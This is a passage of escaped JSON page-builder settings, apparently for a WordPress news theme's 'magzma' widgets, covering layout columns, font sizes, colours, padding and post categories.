,\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":1